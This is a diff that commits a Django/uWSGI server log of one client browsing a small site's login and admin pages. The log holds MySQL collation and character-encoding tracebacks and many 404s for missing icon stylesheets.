+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 233, in login
+ if len(models.User.objects.filter(uid=uid, password=pwd)) != 0:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+[pid: 2069|app: 0|req: 690/900] 180.160.72.163 () {48 vars in 1008 bytes} [Thu Jan 14 08:31:38 2021] POST /login/ => generated 183257 bytes in 118 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 691/901] 180.160.72.163 () {38 vars in 782 bytes} [Thu Jan 14 08:31:52 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/902] 180.160.72.163 () {40 vars in 771 bytes} [Thu Jan 14 08:31:52 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/903] 180.160.72.163 () {40 vars in 793 bytes} [Thu Jan 14 08:31:52 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/904] 180.160.72.163 () {40 vars in 775 bytes} [Thu Jan 14 08:31:52 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/905] 180.160.72.163 () {40 vars in 773 bytes} [Thu Jan 14 08:31:52 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/906] 180.160.72.163 () {40 vars in 779 bytes} [Thu Jan 14 08:31:52 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/907] 180.160.72.163 () {40 vars in 754 bytes} [Thu Jan 14 08:31:52 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/908] 180.160.72.163 () {40 vars in 752 bytes} [Thu Jan 14 08:31:52 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/909] 180.160.72.163 () {40 vars in 760 bytes} [Thu Jan 14 08:31:52 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/910] 180.160.72.163 () {40 vars in 770 bytes} [Thu Jan 14 08:31:52 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/911] 180.160.72.163 () {40 vars in 766 bytes} [Thu Jan 14 08:31:52 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/912] 180.160.72.163 () {40 vars in 823 bytes} [Thu Jan 14 08:31:52 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: 0|req: 692/913] 180.160.72.163 () {40 vars in 834 bytes} [Thu Jan 14 08:31:56 2021] GET /my-admin => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 693/914] 180.160.72.163 () {40 vars in 837 bytes} [Thu Jan 14 08:31:56 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /favicon.ico
+[pid: 2069|app: 0|req: 694/915] 180.160.72.163 () {38 vars in 724 bytes} [Thu Jan 14 08:31:56 2021] GET /favicon.ico => generated 3480 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 695/916] 180.160.72.163 () {48 vars in 924 bytes} [Thu Jan 14 08:32:14 2021] POST /my-admin/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 696/917] 180.160.72.163 () {40 vars in 887 bytes} [Thu Jan 14 08:32:14 2021] GET /admin-home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 697/918] 180.160.72.163 () {40 vars in 889 bytes} [Thu Jan 14 08:32:14 2021] GET /admin-home/ => generated 6515 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: -1|req: -1/919] 180.160.72.163 () {38 vars in 823 bytes} [Thu Jan 14 08:32:14 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/920] 180.160.72.163 () {38 vars in 769 bytes} [Thu Jan 14 08:32:14 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/921] 180.160.72.163 () {38 vars in 757 bytes} [Thu Jan 14 08:32:14 2021] GET /static/css/style.css => generated 118751 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/922] 180.160.72.163 () {38 vars in 786 bytes} [Thu Jan 14 08:32:14 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/923] 180.160.72.163 () {38 vars in 798 bytes} [Thu Jan 14 08:32:14 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/924] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 08:32:14 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/925] 180.160.72.163 () {38 vars in 762 bytes} [Thu Jan 14 08:32:14 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/926] 180.160.72.163 () {38 vars in 738 bytes} [Thu Jan 14 08:32:15 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/927] 180.160.72.163 () {38 vars in 750 bytes} [Thu Jan 14 08:32:15 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/928] 180.160.72.163 () {38 vars in 826 bytes} [Thu Jan 14 08:32:15 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/929] 180.160.72.163 () {38 vars in 822 bytes} [Thu Jan 14 08:32:15 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/930] 180.160.72.163 () {38 vars in 748 bytes} [Thu Jan 14 08:32:15 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 698/931] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 08:32:16 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 699/932] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 08:32:16 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 700/933] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 08:32:16 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 701/934] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 08:32:16 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 702/935] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:16 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 703/936] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:16 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 704/937] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 08:32:16 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 705/938] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 08:32:16 2021] GET /static/css/spinners.css => generated 3516 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 706/939] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 08:32:16 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 707/940] 180.160.72.163 () {40 vars in 891 bytes} [Thu Jan 14 08:32:27 2021] GET /kind-manage => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 708/941] 180.160.72.163 () {40 vars in 893 bytes} [Thu Jan 14 08:32:27 2021] GET /kind-manage/ => generated 6423 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 709/942] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 08:32:27 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 710/943] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 08:32:27 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 711/944] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 08:32:27 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 712/945] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:27 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 713/946] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 08:32:27 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 714/947] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 08:32:27 2021] GET /static/css/spinners.css => generated 3516 bytes in 22 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 715/948] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:27 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 716/949] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 08:32:27 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 717/950] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 08:32:27 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: -1|req: -1/951] 180.160.72.163 () {38 vars in 751 bytes} [Thu Jan 14 08:32:27 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: 0|req: 719/952] 180.160.72.163 () {40 vars in 895 bytes} [Thu Jan 14 08:32:46 2021] GET /kind-manage/? => generated 6423 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 720/953] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 08:32:46 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 721/954] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:46 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 722/955] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 08:32:46 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 723/956] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 08:32:46 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 724/957] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 08:32:46 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 725/958] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:46 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1")
+[pid: 2069|app: 0|req: 725/959] 180.160.72.163 () {48 vars in 977 bytes} [Thu Jan 14 08:32:46 2021] POST /kind-manage/ => generated 206907 bytes in 157 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 726/960] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 08:32:46 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 727/961] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 08:32:46 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 728/962] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 08:32:46 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 730/963] 180.160.72.163 () {40 vars in 896 bytes} [Thu Jan 14 08:32:49 2021] GET /kind-manage/? => generated 6423 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 730/964] 180.160.72.163 () {48 vars in 979 bytes} [Thu Jan 14 08:32:49 2021] POST /kind-manage/? => generated 27 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 731/965] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 08:32:49 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 732/966] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 08:32:49 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
